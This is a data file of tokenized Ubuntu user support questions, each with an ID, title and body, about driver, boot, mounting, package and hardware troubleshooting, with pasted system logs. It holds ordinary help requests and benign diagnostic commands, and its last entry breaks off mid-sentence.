384689	graphics card problems	i get problem in my video card i use amd graphics card amd ati : cedar { radeon hd 5000/6000/7350 series } . i ca n't get good performance to my pc i do n't know what i must do to solve this problem so please help me . thanks
384690	how do i download a torrent file from piratebay ?	when i try to download a torrent file i do n't get prompted by ubuntu 12.04 to select the location where to save the file , instead i get asked to select an application ( which i 'm not able to select for whatever reason ) . if anyone could help out with this it would be greatly appreciated . please note that i 've installed ubuntu two days ago and i 'm completely new to the thing . explain as if you were talking to a 5 years old kid . or a golden retriever . thanks in advance
384691	fglrx intel/ati hybrid video , dual-display flickering	i 'm sorry if the same question is already asked , i checked several ones but the reported problems are different or solution does n't work . so i 've successfully installed fglrx driver on my laptop dell 5520 with intel and ati 7670 graphic cards . had to install latest beta because stable one did n't work showing black screen . so now it seems to be working fine in unity and quake live ( do n't have any other games or benchmarks installed ) . i only noticed some minor problems with graphics that can be probably solved by some tweaks ( i believe so ) . but the problem appears when i plug second display . it is detected properly , resolution is correct i can move windows and so on but it flickers like crazy every time the picture updates . one of the solutions i 've found is to run xrandr -- output vga1 -- auto -- left-of lvds1 -- output vga1 -- auto -- scale 1.0001x1.0001 . after that it really stops flickering but display proportions become incorrect ( i see a part of the window on second display which is actually whole placed on the first ) . also amdcccle does n't have display config section . my xorg.conf is generated by aticonfig : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
384694	dpkg-divert : error : rename involves overwriting `file` with different file `file` not allowed	i ca n't install programs from ubuntu software center . i am asked to remove xserver-common-lts-raring i have tried to purge and remove but to no avail . you would consider me a newb so any help would be appreciated . if asking for more logs , please state exactly what to type/do . thanks . i get the below code with sudo apt-get install -f removing xserver-common-lts-raring ... removing 'diversion of /usr/lib/xorg/protocol.txt to /usr/lib/xorg/protocol-precise.txt by xserver-common-lts-raring' dpkg-divert : error : rename involves overwriting `/usr/lib/xorg/protocol.txt ' with different file `/usr/lib/xorg/protocol-precise.txt ' , not allowed dpkg : error processing xserver-common-lts-raring ( -- remove ) : subprocess installed post-removal script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : xserver-common-lts-raring e : sub-process /usr/bin/dpkg returned an error code ( 1 )
384695	cant boot from usb drive . cant access grub . no graphical interface	i started an upgrade to 12.04 but stalled during install . now , the system boots directly into command window where i must sign in . i tried creating a bootable usb ( no cd drive installed ) with unetbootin and universal usb installer , but the system do not boot to usb first - goes directly to hard drive . i tried accessing the grub menu with all suggested commands ( ex holding shift , f1 , esc , f10 , f12 etc etc etc ) but none worked . how can i install the new version 12.04 lts from usb ? is there any way to install from command line ? or how can i access grub settings from command ? please please please help ! ps . i am not very familiar with linux-type systems , so step-by-step guidance would be appreciated ! ! !
384699	truecrypt file can not be dismounted - ubuntu 13.04	i have mounted a truecrypt file via terminal and can not make it disappear . if i do umount it looks that it worked but if i then go to see the files explorer it is still there . it looks to be umounted , but it 's still there . also , after clicking it , it does not ask for password . i tried to mount it again via truecrypt gui and it mounts ( i can see it twice . ) then i umount it , but the previously mounted truecrypt file is still there ... if i do # mount i can see : /dev/mapper/truecrypt1 on /media/mlotek/ef2f-b9cc i tried : truecrypt -d umount /media/mlotek/ef2f-b9cc it does not give me any errors , but the drive is still there ... have you faced something like this ? cheers !
384702	after changes plymouth theme ubuntu dont boot	after i changed plymouth theme i cant boot up my pc . plymout show but after few second screen go off . i tried pres ctrl + alt + 1 and ctrl + alt + 7 but after that screen turn on but i can see only plymouth animation . can someone please help me to fix it .
384703	how do i dual boot ubuntu 13.10 on my windows 8.1 samsung np35v5c-a01us laptop ?	i made the partition for ubuntu in disc management , and i have also made the live usb . when i put the live usb into my laptop and boot up , windows just boots up normally instead of going to the live usb ... . help !
384707	lifecam cinema prevents boot into ubuntu 13.10	when i have the lifecam cinema webcam plugged in , then there are problems booting into the operating system ( ubuntu 13.1 ) . since i 'm new to ubuntu , i can only describe what happens . it boots as far as a maroon screen ( unlike the themed screen in the current desktop ) asking for a password . i type , but it does n't show up on the password input field . then i notice the light on the webcam , then a tabla sound , then freeze . after i unplug the webcam , ubuntu boots normally , to the themed password entry screen . anyone able to provide guidance to fix this , or is it that ubuntu ca n't use this device ? later , thanks for the directions . i booted , then put in the webcam , noticed that it lights up and then goes off , the system continues to run , so i ran `` dmesg | tail -n 25 '' and got these lines related to the webcam : [ 39.563813 ] usbcore : registered new interface driver usblp [ 235.380107 ] usb 2-1.3 : new high-speed usb device number 5 using ehci-pci [ 235.489287 ] usb 2-1.3 : new usb device found , idvendor=045e , idproduct=075d [ 235.489292 ] usb 2-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 235.489296 ] usb 2-1.3 : product : microsoft\xffffffc2\xffffffae\xffffffae lifecam cinema ( tm ) [ 235.489299 ] usb 2-1.3 : manufacturer : microsoft [ 235.504605 ] linux video capture interface : v2.00 [ 240.624227 ] 5:3:1 : can not get freq at ep 0x82 [ 240.633185 ] usbcore : registered new interface driver snd-usb-audio [ 240.636551 ] uvcvideo : found uvc 1.00 device microsoft\xffffffc2\xffffffae\xffffffae lifecam cinema ( tm ) ( 045e:075d ) [ 240.643626 ] input : microsoft\xffffffc2\xffffffae\xffffffae lifecam cinema ( tm ) as /devices/pci0000:00/0000:00:1d.7/usb2/2-1/2-1.3/2-1.3:1.0/input/input12 [ 240.643705 ] usbcore : registered new interface driver uvcvideo [ 240.643707 ] usb video class driver ( 1.1.1 ) [ 245.776178 ] 5:3:1 : can not get freq at ep 0x82 [ 250.776304 ] 5:3:1 : can not get freq at ep 0x82 [ 255.904243 ] 5:3:1 : can not get freq at ep 0x82 [ 260.904238 ] 5:3:1 : can not get freq at ep 0x82 for the second command ( sudo lsusb -v ) i got self powered maxpower 2ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 204 binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 2 binterfaceclass 7 printer binterfacesubclass 1 printer binterfaceprotocol 2 bidirectional iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x08 ep 8 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x89 ep 9 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 0 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x06 ep 6 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x87 ep 7 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 1 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 212 binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x06 ep 6 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x87 ep 7 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0001 self powered bus 001 device 002 : id 1737:0071 linksys wusb600n v1 dual-band wireless-n network adapter [ ralink rt2870 ] device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x1737 linksys idproduct 0x0071 wusb600n v1 dual-band wireless-n network adapter [ ralink rt2870 ] bcddevice 1.01 imanufacturer 1 cisco-linksys llc iproduct 2 dual-band wireless-n usb network adapter iserial 3 ( error ) bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 67 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 450ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 7 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 5 ( error ) endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x04 ep 4 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x05 ep 5 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x06 ep 6 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0000 ( bus powered ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0002 2.0 root hub bcddevice 3.11 imanufacturer 3 linux 3.11.0-13-generic ehci_hcd iproduct 2 ehci host controller iserial 1 0000:00:1a.7 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 12 hub descriptor : blength 9 bdescriptortype 41 nnbrports 6 whubcharacteristic 0x000a no power switching ( usb 1.0 ) per-port overcurrent protection bpwron2pwrgood 10 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0503 highspeed power enable connect port 2 : 0000.0100 power port 3 : 0000.0503 highspeed power enable connect port 4 : 0000.0100 power port 5 : 0000.0100 power port 6 : 0000.0100 power device status : 0x0001 self powered bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0001 1.1 root hub bcddevice 3.11 imanufacturer 3 linux 3.11.0-13-generic uhci_hcd iproduct 2 uhci host controller iserial 1 0000:00:1a.2 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0002 1x 2 bytes binterval 255 hub descriptor : blength 9 bdescriptortype 41 nnbrports 2 whubcharacteristic 0x000a no power switching ( usb 1.0 ) per-port overcurrent protection bpwron2pwrgood 1 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power device status : 0x0001 self powered bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0001 1.1 root hub bcddevice 3.11 imanufacturer 3 linux 3.11.0-13-generic uhci_hcd iproduct 2 uhci host controller iserial 1 0000:00:1a.1 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0002 1x 2 bytes binterval 255 hub descriptor : blength 9 bdescriptortype 41 nnbrports 2 whubcharacteristic 0x000a no power switching ( usb 1.0 ) per-port overcurrent protection bpwron2pwrgood 1 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power device status : 0x0001 self powered bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0001 1.1 root hub bcddevice 3.11 imanufacturer 3 linux 3.11.0-13-generic uhci_hcd iproduct 2 uhci host controller iserial 1 0000:00:1a.0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0002 1x 2 bytes binterval 255 hub descriptor : blength 9 bdescriptortype 41 nnbrports 2 whubcharacteristic 0x000a no power switching ( usb 1.0 ) per-port overcurrent protection bpwron2pwrgood 1 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power device status : 0x0001 self powered also , i tried skype with the webcam , and it runs . so , it 's just a question as to how i can get ubuntu to boot with it .
384709	program pgp encryption for cloud usage	i do n't know if this is the right place for my question , idea . so let me know if not so . i use ubuntuone . where needed i encrypt all my stuff before i put it on the cloud . you never know who is watching ; ) but there is no program in ubuntu that makes it really simple to do that . it would be nice if there is a program that can import my pgpkey and let me choose a file i want to upload . encrypt it for me and than uploads it to my cloud of choice . in that way people can more safely put a copy of there bookmarks , address-book and other more personal stuff on a cloud . you can than use the program to get the file from the cloud , modify it and upload it a gain , safely encrypted of course . i mis something like this in ubuntu . we almost all use cloud service and lately we know it is not always safe . in this way you can get a little more privacy . and the more people use encryption the safer it gets i guess . maybe it is a stupid idea but i can not program . kim
384711	trouble opening/mounting udf read only dvd	i 'm having a horrible time trying to get this to work , after putting the dvd in i get this uber long error : error mounting /dev/sr0 at /media/cupcake/udf volume : command-line `mount -t `` udf '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , iocharset=utf8 , umask=0077 '' `` /dev/sr0 '' `` /media/cupcake/udf volume '' ' exited with non-zero exit status 32 : mount : block device /dev/sr0 is write-protected , mounting read-only mount : /dev/sr0 : ca n't read superblock so , after reading a million similar problems , in the terminal i tried : sudo mount -t udf /dev/sr0 /cdrom and it spits out : mount : block device /dev/sr0 is write-protected , mounting read-only mount : /dev/sr0 : ca n't read superblock so is there any way to change it from read only ? or something different i can do to open it ? any and all help would be uber appreciated !
384714	unity 2d/3d not working with radeon 7000 ( no panel , launcher , dash , etc . )	problem : neither unity 3d nor 2d display the panel , launcher or dash ( icons disappear as soon as i launch an application , but i can still hover and get a tooltip ) . i have tried removing and reinstalling unity , compiz and ubuntu-desktop . i am running 12.04 lts . i have a ati radeon 7000 graphics card ( 04:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv100 [ radeon 7000 / radeon ve ] ) , which should at least be able to support unity 2d according to compiz documentation . i 'm using the open source driver since the card is not supported by the catalyst/fglrx driver . running unity -- reset results in the following : $ unity -- reset warning : unity currently default profile , so switching to metacity while resetting the values checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x1a00004 compiz ( core ) - warn : failed to receive configurenotify event on 0x1200002 compiz ( core ) - warn : failed to receive configurenotify event on 0x1400002 compiz ( core ) - warn : failed to receive configurenotify event on 0x2a000b3 initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:4691 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed compiz ( unityshell ) - error : opengl 1.4+ not supported compiz ( unityshell ) - error : gl_arb_vertex_program not supported compiz ( unityshell ) - error : gl_arb_fragment_program not supported x error of failed request : badaccess ( attempt to access private resource denied ) major opcode of failed request : 33 ( x_grabkey ) serial number of failed request : 6443 current serial number in output stream : 6689 any help would be much appreciated !
384715	problems with my wi-fi after updating to ubuntu 13.04	i have just updated to ubuntu 13.04 and now my wi-fi connection fails every hour . i have to restart the computer for the system to find my connection again . is anyone having the same problem ?
384716	acer aspire one 725 lubuntu fn + up\down keys do not change the sound level	i 've got a little trouble , which is , as i think , specific only to acer aspire series netbooks . i 've installed lubuntu 13.10 on my acer aspire one 725 and updated software . at first i had a problem with the whole sound of my netbook - alsa triggered an error that mixer was not found . this trouble was solved by installing pulseaudio and pulseaudio volume control . but still , i ca n't adjust sound level with my fn + up/down keys . what can cause such a problem ? thank you ! b.t.w . fn + left\right keys are working fine and changing brightness.but fn + f8 is not muting sound of the system .
384724	installing ubuntu to dual boot with windows 8.1 , windows not recognized during install	i am currently trying to install ubuntu 13.10 to dual-boot with windows 8.1 on my laptop . the laptop is a lenovo ideapad z400 touch . i am getting stuck at the install style screen because the installer is not recognizing windows being already there and i do n't know how i should do the partitioning manually . the boot-repair pastebin is here . i have about 70 gb of unallocated space on my hdd for ubuntu . here is the lbsk output : ubuntu @ ubuntu : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 931.5g 0 disk ├─sda1 8:1 0 1000m 0 part ├─sda2 8:2 0 260m 0 part ├─sda3 8:3 0 1000m 0 part ├─sda4 8:4 0 128m 0 part ├─sda5 8:5 0 839.7g 0 part ├─sda6 8:6 0 350m 0 part └─sda7 8:7 0 20g 0 part sdb 8:16 1 29.3g 0 disk └─sdb1 8:17 1 29.3g 0 part /cdrom sr0 11:0 1 1024m 0 rom loop0 7:0 0 842.7m 1 loop /rofs here is the sudo blkid output : ubuntu @ ubuntu : ~ $ sudo blkid /dev/sda1 : label= '' winre_drv '' uuid= '' cc863f8f863f78d2 '' type= '' ntfs '' /dev/sda2 : label= '' system_drv '' uuid= '' 2241-c2d6 '' type= '' vfat '' /dev/sda3 : label= '' lrs_esp '' uuid= '' 6c41-fe4b '' type= '' vfat '' /dev/sda5 : label= '' windows8_os '' uuid= '' 284245254244f8d8 '' type= '' ntfs '' /dev/sda6 : uuid= '' 145447175446face '' type= '' ntfs '' /dev/sda7 : label= '' pbr_drv '' uuid= '' 8c0c487e0c4864f4 '' type= '' ntfs '' /dev/loop0 : type= '' squashfs '' /dev/sdb1 : label= '' uui '' uuid= '' 50b7-103f '' type= '' vfat '' thanks .
384725	ubuntu 13.10 black screen w/ cursor after startup	after doing some schoolwork i left my computer with ubuntu 13.10 running over night . next morning ; i come back to see it glitching a bit ( software center app dissapeared , terminal is black/white instead of the softer purple/white ) so , like any normal person , i decide to restart it . after restarting it , everything 's working fine . i get to the login screen , log in , etc . but after the login , instead of my desktop w/ the folder/apps i just get my wallpaper with nothing on it . the menu is n't there , and neither are the files . so i decide to browse for a solution on the mighty internet . after opening up tty1 and reinstalling nvidia , unity , bunch of other stuff i find that after i log in instead of my wallpaper it 's now a black screen . i persist and keep install/deleting/reinstalling anything that the forums tell me to and it does . not . work . eventually , ( i know my way around ubuntu ) i just type in 'sudo apt-get install nvidia-current ' and execute it 'till the end . i restart , only to find that after the bootup , instead of the login screen i get that same black screen with a cursor . even if i press ctrl+alt+f1 , my monitor stops receiving input . so after about 2 hours , it finally broke me and so i turn to the forums . any hints/advice/solutions ? system specs will be dispensed at request . any help is greatly appreciated
384728	nvidia driver removal to revert to xorg - i cannnot boot in recovery/failsafe mode	i 'd like to remove the nvidia video driver and revert to the xorg , but i have n't been able to boot in recovery mode . any suggestions ? i can boot from the installation disk , in the live disk mode , and edit/add/remove files . i tried a few things : 1 . ctrl-alt-f1 to f4 do n't take me to a command line where i can try something . 2 . the `` left-shift '' button during boot or the `` esc '' button during boot do n't seem to work for me . 3 . i copied /etc/x11/xorg.conf.failsafe to xog.conf , and then tried rebooting , and it did n't work either . 4 . i edited /etc/default/grub to try a few things : * changed the parameter grub_default to 1 , 2 , and 3 ( instead of 0 ) * commenting out grub_hidden_timeout=0 and grub_hidden_timeout_quiet * enabling grub_gfxmode=640x480 fyi : i installed ubuntu 13.10 on a desktop with nvidia geforce 210 video card . ( motherboard : msi k8n neo4 platinum âms-7125âm , with newest bios : v1.d , 250 gb sata hdd , sata dvd/cd drive , 4 gb ram . ) then i changed the driver to the nvidia driver 319 , and now ubuntu does n't get to the initial login screen anymore .
384730	libnm-glib4:386 with amd64	i have ubuntu 13.10 amd64 and i use libnm-glib4 but i also need i386 version of this lib . but amd64 version conflicts with i386 so i ca n't install it : sudo aptitude install libnm-glib4 : i386 the following new packages will be installed : libgudev-1.0-0 : i386 { a } libnm-glib4 : i386 { b } libnm-util2 : i386 { ab } the following packages have unmet dependencies : libnm-util2 : conflicts : libnm-util2 : i386 but 0.9.8.0-0ubuntu22 is to be installed . libnm-util2 : i386 : conflicts : libnm-util2 but 0.9.8.0-0ubuntu22 is installed . libnm-glib4 : conflicts : libnm-glib4 : i386 but 0.9.8.0-0ubuntu22 is to be installed . libnm-glib4 : i386 : conflicts : libnm-glib4 but 0.9.8.0-0ubuntu22 is installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) libnm-glib4 : i386 [ not installed ] 2 ) libnm-util2 : i386 [ not installed ] sudo apt-get install libnm-glib4 : i386 the following packages have unmet dependencies : libnm-glib4 : i386 : depends : libnm-util2 : i386 ( > = 0.9.6.0+git201212071413.8a9759a ) but it is not going to be installed e : unable to correct problems , you have held broken packages . is there any other way to install libnm-glib4 : i386 ?
384731	printing to ubuntu terminal and file	if i want log everything that happens on the websites on my server into the terminal ( where you type ) and into a file , well how would i do that using php ?
384733	mount to directory in encrypted home	i am having difficulty automatically mounting my disk drive to a folder inside my home directory . i have found that if i add the line uuid=0dc6753f-fd25-4f30-aac8-95aae93873ce /home/stuart/extra_storage ext4 defaults 0 2 to my /etc/fstab and then perform sudo mount -a all is swell , but if i reboot , the files do not appear inside that directory . however , if i change the mount path to /mnt/extra_storage then there are no problems . i believe this may have something to do woth the encrypted home directory option i selected during the ubuntu installation . can anyone confirm that this is the case and whether there is a way to resolve this ?
384735	linux equivalents of windows / dos terms	i am trying to adjust to linux terms after many years of dos and windows . i have been wanting to switch from windows to linux for years now , but could n't decide on a flavor . today i got fed up with windows 7 and just picked one -- ubuntu . i know linux has different terms and the file system is a little different . right now i am trying to find the linux equivalent of the root directory . my external drives all have their proper names , but the c : drive 's name apparently was changed . i would like to change it back , if possible . is there a glossary or something that can be used ?
384736	how do i maximize an already open gnome-terminal window from command line ?	i know you can open an new gnome-terminal maximized by using : gnome-terminal -- maximize that is not my question . is there a command that i can use to maximize the current terminal where i am in . i know you can use ctrl+super+up to maximize it , but i want to do it from the terminal using a command .
384737	bluetooth android phone fails to connect ?	while ubuntu 13.10 bluetooth identifies and pairs my phone , the `` connect '' switch remains greyed out and it will neither send or receives files . i have added `` blueman '' and other support software , but it just does not work
384738	how do you get grammatical corrections in abiword under ubuntu ?	i 'm running ubuntu 12 , installed abiword through apt-get . i can turn on automatic grammar checking in the preferences , and it starts to underline errors in green . but i ca n't right-click on them to get suggestions or otherwise get an explanation of the errors or corrections . how can i get it to give me corrections and suggestions ?
384740	how to transfer my windows 7 files to ubuntu	just installed ubuntu , thinking i would be able to access my files under windows 7 ... i was wrong . how can i access them and transfer them to ubuntu ?
384745	dual boot windows 8.1 and ubuntu	i have a hp envy dv7 with windows 8 installed from factory and recently upgraded to windows 8.1 . i have dual booted windows and ubuntu on my last windows 7 laptop , but now i can´t figure it out . on my last laptop i would power it up , press f12 or something and boot it trough the usb drive , and then install trough the option install ubuntu side-by-side windows or would just install it on other partition . and it would work just fine . now , with windows 8.1 i dont get that inicial boot screen that tells me to press f12 to boot from other device , the computer just starts booting really quick ( xd ) .i have to go to settings and select advanced boot and tell him to boot from usb . and when i get to install ubuntu it doesn´t show the option to install side-by-side with windows . i hear some talk about grub but i don´t know what that is . can someone please give me a hand ?
384748	how do i connect to a hidden wifi network in kubuntu 13.10 ?	i just installed kubuntu 13.10 on a laptop . i was trying to connect to a hidden wi-fi network with wpa2 security and i noticed there is no way to connect to it from the network manager . i ca n't connect to the internet without wi-fi so i ca n't download any programs to do it and i was wondering if there is a way to connect at all .
384749	where i can find information about updates	some minutes ago i gained `` restar to updates take effect '' ( do n't remember exectly the words ) . but i did n't see update program window . i by my self runing this program . result : last information about updates - 1 day ago . may be it becouse my time 00:44 am . but no settings allow to install updates without my `` last word '' . but i have installed gnome more settings ( themes and icons and ... so wher i can find information about -- what was update ?
384752	how to reinstall services ?	i made a mistake and deletes the etc/mysql/ directory . i installed lamp-server again ( sudo tasksel install lamp-server ) but i still do n't have the etc/mysql directory and some of other mysql directories too i think . i want reinstall all the directories of mysql but do n't know how to .
384754	ati gaming system on 13.10 with severe lag	i 'm a pretty experienced linux user . i started 20 years ago with slackware before guis existed and transitioned to debian before quitting linux for a while . last night i got the itch to install ubuntu again ( my previous experience being ibex i think ) . i am installing it on a gaming rig which is probably not optimal for a lot of things linux needs but with the processor/ram/video card i find it hard to believe i am experiencing such issues . interface lag - nothing happens fast . using tweetdeck , tweets come in via my timeline and `` ghost in '' as if they transition in in slow motion ( hard to explain but video ghosting is the best explanation i can provide for it ) typing a url into firefox is abysmally slow . before i can put in the first four characters , the first two have just typed . things i 've tried : write-caching on hdd changing to all three of the available ati/amd drivers available in software center . i 've also tried the newest ati/amd drivers available on their site . made some tweaks to compiz in opengl ( i 've also tried fedora with the same results so i know it 's driver/software related and not something ubuntu has specifically done 